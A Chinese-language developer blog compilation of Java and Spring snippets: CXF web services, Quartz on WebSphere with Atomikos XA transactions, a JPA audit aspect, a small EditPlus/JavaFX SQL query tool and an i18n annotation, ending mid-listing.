public class FooTest extends AbstractJUnit38SpringContextTests {

@Autowired
private FooService service;;

public void testHi(){
FooBean bean = new FooBean();
MockPortletRequest request = new MockPortletRequest();
MockPortletSession session = new MockPortletSession();
session.setAttribute(FooBean.class.getName()
+ "/programme", "06721", PortletSession.APPLICATION_SCOPE);
request.setSession(session);
bean.setPortletRequest(request);
bean.setLoginUser("Jay");

bean.setService(service);
bean.hi("Forest");
}
}

Apache CXF + Spring

比较了Spring WS和Apache CXF,觉得Spring WS属于contract-first类型的WebService,自己不熟悉xsd,
所以使用Apache CXF这个组件,而且它的功能更为强大并且可以与Spring整合。
部署在tomcat上,然后访问 http://127.0.0.1:8080/foo/HelloWorld?wsdl

applicationContext.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:aop="http://www.springframework.org/schema/aop"
xmlns:context="http://www.springframework.org/schema/context"
xmlns:tx="http://www.springframework.org/schema/tx"
xmlns:jee="http://www.springframework.org/schema/jee"
xmlns:jaxws="http://cxf.apache.org/jaxws"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-2.5.xsd
http://www.springframework.org/schema/tx http://www.springframework.org/schema/tx/spring-tx-2.5.xsd
http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-2.5.xsd
http://www.springframework.org/schema/aop http://www.springframework.org/schema/aop/spring-aop-2.5.xsd
http://www.springframework.org/schema/jee http://www.springframework.org/schema/jee/spring-jee-2.5.xsd
http://cxf.apache.org/jaxws http://cxf.apache.org/schemas/jaxws.xsd">

<context:component-scan base-package="xx" />
<context:annotation-config />

<bean id="entityManagerFactory"
class="org.springframework.orm.jpa.LocalContainerEntityManagerFactoryBean">
<property name="persistenceXmlLocation"
value="classpath:META-INF/persistence.xml" />
<property name="persistenceUnitName" value="someDB" />
</bean>


<bean id="transactionManager"
class="org.springframework.orm.jpa.JpaTransactionManager">
<property name="entityManagerFactory"
ref="entityManagerFactory" />
</bean>

<tx:annotation-driven transaction-manager="transactionManager" />

<tx:advice id="syncAdvice"
transaction-manager="transactionManager">
<tx:attributes>
<tx:method name="get*" read-only="true" />
<tx:method name="*" read-only="false" />
</tx:attributes>
</tx:advice>

<aop:config>
<aop:pointcut id="syncOperation"
expression="execution(public * xx..*Service.*(..))" />
<aop:advisor advice-ref="syncAdvice"
pointcut-ref="syncOperation" />
</aop:config>

<import resource="classpath:META-INF/cxf/cxf.xml" />
<import resource="classpath:META-INF/cxf/cxf-extension-soap.xml" />
<import resource="classpath:META-INF/cxf/cxf-servlet.xml" />

<jaxws:endpoint id="helloWorld" implementor="#helloWorldService"
address="/HelloWorld" />

<jaxws:client id="helloWorldClient"
serviceClass="xx.HelloWorld"
address="http://localhost:8080/shape/shape2sp" />

</beans>

web.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version="2.4">
<listener>
<listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>
</listener>
<servlet>
<servlet-name>CXFServlet</servlet-name>
<display-name>CXF Servlet</display-name>
<servlet-class>
org.apache.cxf.transport.servlet.CXFServlet
</servlet-class>
<load-on-startup>1</load-on-startup>
</servlet>

<servlet-mapping>
<servlet-name>CXFServlet</servlet-name>
<url-pattern>/*</url-pattern>
</servlet-mapping>
</web-app>

HelloWorld.java

1
2
3
4
5
6
package xx;

@WebService
public interface HelloWorld {
void sayHi(String user);
}

HelloWorldService.java

1
2
3
4
5
6
7
8
9
package xx;

@Service
@WebService(endpointInterface = "xx.HelloWorld", serviceName = "HelloWorld")
public class HelloWorldService implements HelloWorld{
public void sayHi(String user){
System.out.println("hello: " + user);
}
}

hg config

hg --config=http_proxy.host=proxyhost:8080 clone https://xx@code.google.com/p/projectname/

hgrc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[paths]
default = https://xx@code.google.com/p/projectname/
[ui]
username = xx

[extensions]
extdiff =
[extdiff]
cmd.bc = C:/Program Files (x86)/Beyond Compare 3/BComp.exe
opts.bc = /ro

[http_proxy]
host = proxyserver:8080
user =
passwd =

Websphere下的Scheduler

项目需要些一个在Websphere下写一个Scheduler,很自然想到使用Quartz,可是总出现unmanaged thead的问题,
折腾多时最后放弃使用org.springframework.transaction.jta.WebSphereUowTransactionManager,改用
com.atomikos.icatch.jta.UserTransactionManager,问题就解决了

applicationContext.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:aop="http://www.springframework.org/schema/aop"
xmlns:context="http://www.springframework.org/schema/context"
xmlns:tx="http://www.springframework.org/schema/tx"
xmlns:jee="http://www.springframework.org/schema/jee"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-2.5.xsd
http://www.springframework.org/schema/tx http://www.springframework.org/schema/tx/spring-tx-2.5.xsd
http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-2.5.xsd
http://www.springframework.org/schema/aop http://www.springframework.org/schema/aop/spring-aop-2.5.xsd
http://www.springframework.org/schema/jee http://www.springframework.org/schema/jee/spring-jee-2.5.xsd">

<context:component-scan base-package="xx.yy" />
<context:annotation-config />

<jee:jndi-lookup id="spds" jndi-name="jdbc/X1"
cache="true" expected-type="javax.sql.DataSource"
lookup-on-startup="true" />

<jee:jndi-lookup id="srsds" jndi-name="jdbc/X2"
cache="true" expected-type="javax.sql.DataSource"
lookup-on-startup="true" />

<jee:jndi-lookup id="casds" jndi-name="jdbc/X3"
cache="true" expected-type="javax.sql.DataSource"
lookup-on-startup="true" />

<bean id="entityManagerFactory"
class="org.springframework.orm.jpa.LocalContainerEntityManagerFactoryBean">
<property name="persistenceXmlLocation"
value="classpath:META-INF/persistence.xml" />
<property name="persistenceUnitName" value="sp" />
<property name="dataSource" ref="spds" />
</bean>

<bean id="srsEntityManagerFactory"
class="org.springframework.orm.jpa.LocalContainerEntityManagerFactoryBean">
<property name="persistenceXmlLocation"
value="classpath:META-INF/persistence.xml" />
<property name="persistenceUnitName" value="srs" />
<property name="dataSource" ref="srsds" />
</bean>

<bean id="casEntityManagerFactory"
class="org.springframework.orm.jpa.LocalContainerEntityManagerFactoryBean">
<property name="persistenceXmlLocation"
value="classpath:META-INF/persistence.xml" />
<property name="persistenceUnitName" value="cas" />
<property name="dataSource" ref="casds" />
</bean>

<bean id="AtomikosTransactionManager"
class="com.atomikos.icatch.jta.UserTransactionManager"
init-method="init" destroy-method="close">

<property name="forceShutdown" value="false" />
</bean>

<bean id="AtomikosUserTransaction"
class="com.atomikos.icatch.jta.UserTransactionImp">
<property name="transactionTimeout" value="300" />
</bean>

<bean id="transactionManager"
class="org.springframework.transaction.jta.JtaTransactionManager">
<property name="transactionManager"
ref="AtomikosTransactionManager" />
<property name="userTransaction" ref="AtomikosUserTransaction" />
</bean>

<tx:annotation-driven transaction-manager="transactionManager" />

<tx:advice id="cronAdvice"
transaction-manager="transactionManager">
<tx:attributes>
<tx:method name="get*" read-only="true" />
<tx:method name="*" read-only="false" />
</tx:attributes>
</tx:advice>

<aop:config>
<aop:pointcut id="cronOperation"
expression="execution(public * xx.yy..*Service(..))" />
<aop:advisor advice-ref="cronAdvice"
pointcut-ref="cronOperation" />
</aop:config>

<!-- mail -->
<context:property-placeholder location="WEB-INF/mail.properties" />
<bean id="mailSender"
class="org.springframework.mail.javamail.JavaMailSenderImpl">
<property name="host" value="${mail.host}" />
<property name="username" value="${mail.username}" />
<property name="password" value="${mail.password}" />
<property name="port" value="${mail.port}" />
<property name="javaMailProperties">
<props>
<prop key="mail.debug">false</prop>
<prop key="mail.smtp.auth">true</prop>
</props>
</property>
</bean>
<bean id="templateMessage"
class="org.springframework.mail.SimpleMailMessage">
<property name="from" value="${mail.from}" />
</bean>

</beans>

applicationContext-Quartz.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:aop="http://www.springframework.org/schema/aop"
xmlns:context="http://www.springframework.org/schema/context"
xmlns:tx="http://www.springframework.org/schema/tx"
xmlns:jee="http://www.springframework.org/schema/jee"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-2.5.xsd
http://www.springframework.org/schema/tx http://www.springframework.org/schema/tx/spring-tx-2.5.xsd
http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-2.5.xsd
http://www.springframework.org/schema/aop http://www.springframework.org/schema/aop/spring-aop-2.5.xsd
http://www.springframework.org/schema/jee http://www.springframework.org/schema/jee/spring-jee-2.5.xsd">


<bean id="ttl006Timer"
class="org.springframework.scheduling.quartz.MethodInvokingJobDetailFactoryBean">
<property name="targetObject" ref="txnSyncJob" />
<property name="targetMethod" value="run" />
<property name="concurrent" value="false" />
</bean>

<bean id="ttl06cronTrigger"
class="org.springframework.scheduling.quartz.CronTriggerBean">
<property name="jobDetail" ref="ttl006Timer" />
<property name="cronExpression" value="0/30 * * * * ?" />
</bean>


<bean id="act016Timer"
class="org.springframework.scheduling.quartz.MethodInvokingJobDetailFactoryBean">
<property name="targetObject" ref="activityJob" />
<property name="targetMethod" value="run" />
<property name="concurrent" value="false" />
</bean>

<bean id="act016cronTrigger"
class="org.springframework.scheduling.quartz.CronTriggerBean">
<property name="jobDetail" ref="act016Timer" />
<property name="cronExpression" value="0/50 * * * * ?" />
</bean>


<bean
class="org.springframework.scheduling.quartz.SchedulerFactoryBean" destroy-method="destroy">
<property name="waitForJobsToCompleteOnShutdown" value="false"/>
<property name="triggers">
<list>
<ref bean="ttl06cronTrigger" />
<ref bean="act016cronTrigger" />
</list>
</property>
</bean>

</beans>

web.xml

  <?xml version="1.0" encoding="UTF-8"?>
  <web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version="2.4">
    <context-param>
      <param-name>contextConfigLocation</param-name>
      <param-value>/WEB-INF/applicationContext.xml, /WEB-INF/applicationContext-Quartz.xml</param-value>
    </context-param>

    <context-param>
      <param-name>log4jConfigLocation</param-name>
      <param-value>/WEB-INF/classes/log4j.xml</param-value>
    </context-param>
    <listener>
      <listener-class>org.springframework.web.util.Log4jConfigListener</listener-class>
    </listener>
    <listener>
      <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>
    </listener>
  </web-app>

参考
http://www.ibm.com/developerworks/websphere/techjournal/0609_alcott/0609_alcott.html

Spring事务的一些应用

TransactionManager通过TransactionSynchronizationManager进行事务控制,TransactionTemplate就使用transactionManager运行sql。

TransactionTemplate -> PlatformTransactionManager -> TransactionSynchronizationManager

1
2
3
4
5
6
7
TransactionTemplate transactionTemplate = new TransactionTemplate(transactionManager);
transactionTemplate.execute(new TransactionCallbackWithoutResult() {
@Override
protected void doInTransactionWithoutResult(TransactionStatus arg0) {
int count = em.createNativeQuery("delete XX").executeUpdate();
}
});

可以利用TransactionAspectSupport.currentTransactionStatus()控制事务状态,利用setRollbackOnly
要知道是否一个活动事务可以用TransactionSynchronizationManager.isActualTransactionActive()

写了一个Audit,目的在事务结束前调用一个oracle的package,记录所有变化的数据。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
import java.lang.reflect.Field;
import java.sql.CallableStatement;
import java.sql.Connection;
import java.sql.SQLException;
import java.util.Map;

import javax.persistence.EntityManager;

import oracle.jdbc.driver.OracleTypes;

import org.apache.log4j.Logger;
import org.aspectj.lang.JoinPoint;
import org.aspectj.lang.annotation.After;
import org.aspectj.lang.annotation.Aspect;
import org.aspectj.lang.annotation.Before;
import org.aspectj.lang.annotation.Pointcut;
import org.hibernate.Session;
import org.hibernate.jdbc.Work;
import org.springframework.orm.jpa.EntityManagerFactoryInfo;
import org.springframework.orm.jpa.EntityManagerHolder;
import org.springframework.orm.jpa.LocalEntityManagerFactoryBean;
import org.springframework.stereotype.Component;
import org.springframework.transaction.interceptor.TransactionAspectSupport;
import org.springframework.transaction.support.TransactionSynchronizationManager;

@Component
@Aspect
public class AuditRecorder {
private static final Logger log = Logger.getLogger(AuditRecorder.class);

@After("execution(public * xx.yy..*Service.*(..)) && @annotation(auditable)")
public void recordUsage(JoinPoint jp) {
audit();
}

private void audit() {
if (TransactionSynchronizationManager.isActualTransactionActive()) {
Map map = TransactionSynchronizationManager.getResourceMap();
log.info("mapsize " + map.size());
for (Object key : map.keySet()) {
log.debug("key " + key + " , " + map.get(key));

if (key instanceof EntityManagerFactoryInfo) {
EntityManagerFactoryInfo info = (EntityManagerFactoryInfo) key;

String unitName = info.getPersistenceUnitName();
if (!unitName.contains("srs") && !unitName.contains("cas")) {
log.debug("call audit procedure.");
if (map.get(key) instanceof EntityManagerHolder) {
EntityManagerHolder emHolder = (EntityManagerHolder) map
.get(key);
EntityManager em = emHolder.getEntityManager();
Session s = (Session) em.getDelegate();
s.doWork(new Work() {
public void execute(Connection conn)
throws SQLException {
String sql = "{call SP_COMMON.setloginuser(?)}";
CallableStatement call = conn
.prepareCall(sql);
call.setString(1, "test");
call.executeUpdate();

CallableStatement call2 = conn
.prepareCall("{? = call SP_COMMON.getloginuser}");
call2.registerOutParameter(1,
OracleTypes.VARCHAR);
call2.executeQuery();

System.out.println("<< "
+ call2.getString(1));
}
});
}
}
}
}
}
}
}

EditPlus + JavaFx 编写SQL简易查询器

用过DbVisualizer和Oracle SQL Developer,感觉有不足之处,遂期望在EditPlus上打造一个简易的SQL查询器。

Query.java, 用于在EditPlus上显示结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
package forest;

import static java.lang.System.out;

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.ResultSetMetaData;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;

import org.apache.commons.beanutils.BasicDynaClass;
import org.apache.commons.beanutils.DynaBean;
import org.apache.commons.beanutils.DynaProperty;

public class Query {
static Connection conn;
static String xxUrl = "jdbc:oracle:thin:@192.168.0.1:1521:SP";
static String yyUrl = "jdbc:oracle:thin:@192.168.0.2:1521:XE";
static String zzUrl = "jdbc:sqlserver://192.168.0.3:1433;DatabaseName=northwind";
static List<DynaBean> beans = new ArrayList<DynaBean>();
static List<String> columnNames = new ArrayList<String>();
static {
try {
Class.forName("oracle.jdbc.driver.OracleDriver");
Class.forName("com.microsoft.sqlserver.jdbc.SQLServerDriver");
} catch (Exception e) {
e.printStackTrace();
}
}

public static List<DynaBean> getBeans() {
return beans;
}

public static List<String> getColumnNames() {
return columnNames;
}

private static void consoleRunSQL(String sql) throws Exception {
runSQL(sql);
StringBuilder sb = new StringBuilder();
for (DynaBean bean : beans) {
for (int i = 1; i <= columnNames.size(); i++) {
String col = columnNames.get(i - 1);
String row = String.format("%-18s = %s\n", col, bean.get(col));
sb.append(row);
}
sb.append("-------------------------\n\n");
sb.append("total: " + beans.size() + " records.");
out.println(sb.toString());
}

}

private static void runSQL(String sql) throws Exception {
if (sql.trim().length() == 0) {
out.println("sql is empty.");
return;
}
// out.println("run " + sql);
ResultSet rs = null;
Statement stmt = null;

out.println("");
if (!sql.startsWith("select")) {
stmt = conn.createStatement();
int rows = stmt.executeUpdate(sql);
out.println(rows + " reords has been process.");
return;
}

try {
stmt = conn.createStatement(ResultSet.TYPE_FORWARD_ONLY,
ResultSet.CONCUR_READ_ONLY);
rs = stmt.executeQuery(sql);
ResultSetMetaData metaRs = rs.getMetaData();

int columns = metaRs.getColumnCount();

List<DynaProperty> props = new ArrayList<DynaProperty>();
for (int i = 1; i <= columns; i++) {
String colName = metaRs.getColumnName(i).toLowerCase();
props.add(new DynaProperty(colName, String.class));

columnNames.add(colName);
}

BasicDynaClass dynaClass = new BasicDynaClass("JDBCResult", null,
props.toArray(new DynaProperty[0]));

while (rs.next()) {
DynaBean bean = dynaClass.newInstance();
for (int i = 1; i <= columns; i++) {
bean.set(columnNames.get(i - 1).toLowerCase(), rs
.getString(i));
}
beans.add(bean);
}

} finally {
if (rs != null) {
rs.close();
stmt.close();
}
}
}

public static void launch(String[] args) throws Exception {
if (args.length < 2) {
out.println("enter arguments.");
return;
}
if (args[0].equals("xx")) {
initSP();
} else if (args[0].equals("yy")) {
initSRS();
} else if (args[0].equals("zz")) {
initCAS();
} else {
out.println("type is wrong, it should be xx / yy / zz.");
return;
}
try {
if (args.length == 2)
consoleRunSQL(args[1]);
else
runSQL(args[2]);
} finally {
conn.close();
}
}

private static void initSP() throws SQLException {
conn = DriverManager.getConnection(xxUrl, "xx", "xx");
}

private static void initSRS() throws SQLException {
conn = DriverManager.getConnection(yyUrl, "yy", "yy");
}

private static void initCAS() throws SQLException {
conn = DriverManager.getConnection(zzUrl, "zz", "zz");
}

public static void test() throws Exception {
String[] args = new String[] { "xx",
"select * from xxTable" };
launch(args);
}

public static void main(String[] args) throws Exception {
launch(args);
// test();
}

}

QueryVisual.java, 用于在GUI上显示结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
package forest;

import java.util.List;

import javafx.application.Application;
import javafx.collections.FXCollections;
import javafx.event.EventHandler;
import javafx.geometry.Insets;
import javafx.scene.Group;
import javafx.scene.Scene;
import javafx.scene.control.Label;
import javafx.scene.control.ScrollPane;
import javafx.scene.control.TableColumn;
import javafx.scene.control.TableView;
import javafx.scene.control.ScrollPane.ScrollBarPolicy;
import javafx.scene.input.KeyCode;
import javafx.scene.input.KeyEvent;
import javafx.scene.layout.VBox;
import javafx.scene.text.Font;
import javafx.stage.Stage;
import javafx.util.Callback;

import org.apache.commons.beanutils.BasicDynaBean;
import org.apache.commons.beanutils.DynaBean;

public class QueryVisual extends Application implements EventHandler<KeyEvent> {
private TableView<DynaBean> table = new TableView<DynaBean>();

public static void main(String[] args) throws Exception {
Query.launch(args);
launch(args);
}

@Override
public void start(Stage stage) throws Exception {
Scene scene = new Scene(new Group());
stage.setTitle("Result View");

final Label label = new Label("SQL Result");
label.setFont(new Font("Arial", 20));

table.setStyle("-fx-base: #b6e7c9;");

final List<String> cols = Query.getColumnNames();
List<DynaBean> rows = Query.getBeans();
for (final String col : cols) {
TableColumn<String> nameCol = new TableColumn<String>(col);
nameCol
.setDataRetriever(new Callback<TableColumn.CellDataFeatures<String>, String>() {
public String call(
TableColumn.CellDataFeatures<String> p) {
return (String) ((BasicDynaBean) p.getValue())
.get(col.toLowerCase());
}
});
table.getColumns().add(nameCol);
}

table.setItems(FXCollections.observableArrayList(rows));
table.setPrefHeight(380);
table.setPrefWidth(600);
final VBox vbox = new VBox();
vbox.setSpacing(5);
vbox.getChildren().addAll(label, table);
vbox.setPadding(new Insets(10, 0, 0, 10));
ScrollPane sp = new ScrollPane();
sp.setHbarPolicy(ScrollBarPolicy.ALWAYS);
sp.setVbarPolicy(ScrollBarPolicy.ALWAYS);

sp.setPrefHeight(400);
sp.setPrefWidth(760);

sp.setNode(vbox);

sp.setOnKeyReleased(this);
scene.setOnKeyReleased(this);

((Group) scene.getRoot()).getChildren().add(sp);
stage.setScene(scene);
stage.setVisible(true);
}

@Override
public void handle(KeyEvent event) {
if (event.getCode().equals(KeyCode.ESCAPE))
System.exit(0);
}
}

EditPlus的用户工具配置

tool_ui.ini

控制台显示

1
2
3
4
Text=run SQL in Console
Command=C:\Users\user\Desktop\Forest\command\run SQL.bat
Argument=$(Prompt) "$(CurSel)"
InitDir=$(FileDir)

run SQL.bat
"C:\Program Files\Java\jre7\bin\java.exe" -cp .;"C:\Users\user\workspace\SQL Query\bin";C:\Users\user\workspace\common-lib\ojdbc14.jar;C:\Users\user\workspace\common-lib\sqljdbc4.jar;C:/Users/user/Desktop/Forest/spring-framework-2.5.6/lib/jakarta-commons/commons-beanutils.jar;C:/Users/user/Desktop/Forest/spring-framework-2.5.6/lib/jakarta-commons/commons-lang.jar forest.Query %1 %2

GUI显示

1
2
3
4
Text=run SQL in GUI
Command=C:\Users\user\Desktop\Forest\command\javafx.bat
Argument=$(Prompt) "$(CurSel)"
InitDir=$(FileDir)

javafx.bat
"C:\Program Files\Java\jre7\bin\java.exe" -cp C:\Users\user\Downloads\javafx-sdk2.0-beta\rt\lib\jfxrt.jar;.;"C:\Users\user\workspace\SQL Query\bin";C:\Users\user\workspace\common-lib\ojdbc14.jar;C:\Users\user\workspace\common-lib\sqljdbc4.jar;C:/Users/user/Desktop/Forest/spring-framework-2.5.6/lib/jakarta-commons/commons-beanutils.jar;C:/Users/user/Desktop/Forest/spring-framework-2.5.6/lib/jakarta-commons/commons-lang.jar forest.QueryVisual %1 "gui" %2

Spring + JPA + atomikos实现Oracle + SQL Server

persistence.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?xml version="1.0" encoding="UTF-8"?>
<persistence version="1.0"
xmlns="http://java.sun.com/xml/ns/persistence"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/persistence http://java.sun.com/xml/ns/persistence/persistence_1_0.xsd">

<persistence-unit name="orcaleXA" transaction-type="JTA">
<provider>org.hibernate.ejb.HibernatePersistence</provider>
<properties>
<property name="hibernate.dialect"
value="org.hibernate.dialect.Oracle10gDialect" />
<property name="hibernate.connection.driver_class"
value="oracle.jdbc.xa.client.OracleXADataSource" />
<property name="hibernate.connection.url"
value="jdbc:oracle:thin:name/password@192.168.201.215:1521:XE" />
<property name="hibernate.show_sql" value="true" />
<!-- property name="hibernate.transaction.factory_class"
value="com.atomikos.icatch.jta.hibernate3.AtomikosJTATransactionFactory" /-->
<property name="hibernate.transaction.manager_lookup_class"
value="com.atomikos.icatch.jta.hibernate3.TransactionManagerLookup" />
</properties>
</persistence-unit>


<persistence-unit name="sqlServerXA" transaction-type="JTA">
<provider>org.hibernate.ejb.HibernatePersistence</provider>
<properties>
<property name="hibernate.dialect"
value="org.hibernate.dialect.SQLServerDialect" />
<property name="hibernate.transaction.manager_lookup_class"
value="com.atomikos.icatch.jta.hibernate3.TransactionManagerLookup" />
<property name="hibernate.show_sql" value="true" />
</properties>
</persistence-unit>
</persistence>

atomikos文档上说不用设置hibernate.transaction.factory_class,另外发现在WAS配置Hibernate JPA也应该不要设置hibernate.transaction.factory_class。

applicationContext.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:aop="http://www.springframework.org/schema/aop"
xmlns:context="http://www.springframework.org/schema/context"
xmlns:tx="http://www.springframework.org/schema/tx"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-2.5.xsd
http://www.springframework.org/schema/tx http://www.springframework.org/schema/tx/spring-tx-2.5.xsd
http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-2.5.xsd
http://www.springframework.org/schema/aop http://www.springframework.org/schema/aop/spring-aop-2.5.xsd">

<context:component-scan base-package="xx.yy.mypackage" />
<context:annotation-config />

<bean id="dataSource"
class="com.atomikos.jdbc.AtomikosDataSourceBean" init-method="init" destroy-method="close">
<property name="uniqueResourceName">
<value>XADBMS</value>
</property>
<property name="xaDataSourceClassName">
<value>com.microsoft.sqlserver.jdbc.SQLServerXADataSource</value>
</property>
<property name="xaProperties">
<props>
<prop key="user">sa</prop>
<prop key="password">Passw0rd</prop>
<prop key="serverName">192.168.201.214</prop>
<prop key="databaseName">myDataBase</prop>
</props>
</property>
<property name="poolSize">
<value>1</value>
</property>
</bean>

<bean id="orcaleXAEntityManagerFactory"
class="org.springframework.orm.jpa.LocalContainerEntityManagerFactoryBean">
<property name="persistenceXmlLocation"
value="/META-INF/persistence.xml" />
<property name="persistenceUnitName" value="orcaleXA" />
</bean>

<bean id="sqlServerXAEntityManagerFactory"
class="org.springframework.orm.jpa.LocalContainerEntityManagerFactoryBean">
<property name="persistenceXmlLocation"
value="/META-INF/persistence.xml" />
<property name="persistenceUnitName" value="sqlServerXA" />
<property name="dataSource" ref="dataSource" />
</bean>

<!-- bean id="transactionManager"
class="org.springframework.orm.jpa.JpaTransactionManager">
<property name="entityManagerFactory" ref="emf" />
</bean-->

<bean id="AtomikosTransactionManager"
class="com.atomikos.icatch.jta.UserTransactionManager"
init-method="init" destroy-method="close">
<property name="forceShutdown" value="false" />
</bean>

<bean id="AtomikosUserTransaction"
class="com.atomikos.icatch.jta.UserTransactionImp">
<property name="transactionTimeout" value="300" />
</bean>

<bean id="transactionManager"
class="org.springframework.transaction.jta.JtaTransactionManager">
<property name="transactionManager"
ref="AtomikosTransactionManager" />
<property name="userTransaction" ref="AtomikosUserTransaction" />
</bean>

<tx:annotation-driven transaction-manager="transactionManager" />

<tx:advice id="txAdvice" transaction-manager="transactionManager">
<tx:attributes>
<tx:method name="get*" read-only="true" />
<tx:method name="find" read-only="true" />
<tx:method name="check" read-only="true" />
<tx:method name="*" read-only="false" />
</tx:attributes>
</tx:advice>

<aop:config>
<aop:pointcut id="txPointcut"
expression="execution(public * xx.yy.mypacke..*Service.*(..))" />
<aop:advisor advice-ref="txAdvice"
pointcut-ref="txPointcut" />
</aop:config>
</beans>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
@Service
public class XxService {
@PersistenceContext(unitName = "orcaleXA")
private EntityManager oracleXaEm;

@PersistenceContext(unitName = "sqlServerXA")
private EntityManager sqlServerXaEm;
public void run(){
oracleXaEm.createQuery("...");
sqlServerXaEm.createQuery("...");
}
}

@ContextConfiguration(locations = "/applicationContext.xml")
public class TestXA extends AbstractJUnit38SpringContextTests {
@Autowired
private XxService xxService;

public void testRun() {
System.out.println("<<");
myService.go();
}
}

lib:

1
2
3
4
5
6
atomikos-util.jar 
transactions-jta.jar
transactions-api.jar
transactions.jar
transactions-hibernate3.jar
transactions-jdbc.jar

简易I18n转换Engine

分三部分:

  1. I18nFiled
  2. 在Entity里面指定i18n字段
  3. 调用convertI18n(xEntity).getI18nShortDesc()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
import java.lang.annotation.ElementType;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;

@Target( { ElementType.METHOD, ElementType.FIELD })
@Retention(RetentionPolicy.RUNTIME)
public @interface I18nFiled {
String en();

String sc();

String tc();
}
1
2
3
4
5
6
7
8
9
10
11
12
13
public class XEntity implements Serializable {
@Transient
@I18nFiled(en = "shortDescEn", sc = "shortDescSc", tc = "shortDescTc")
private String i18nShortDesc;

public String getI18nShortDesc() {
return i18nShortDesc;
}

public void setI18nShortDesc(String shortDesc) {
i18nShortDesc = shortDesc;
}
}

AUser的默认语言是英文,BUser的默认语言是繁体中文

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
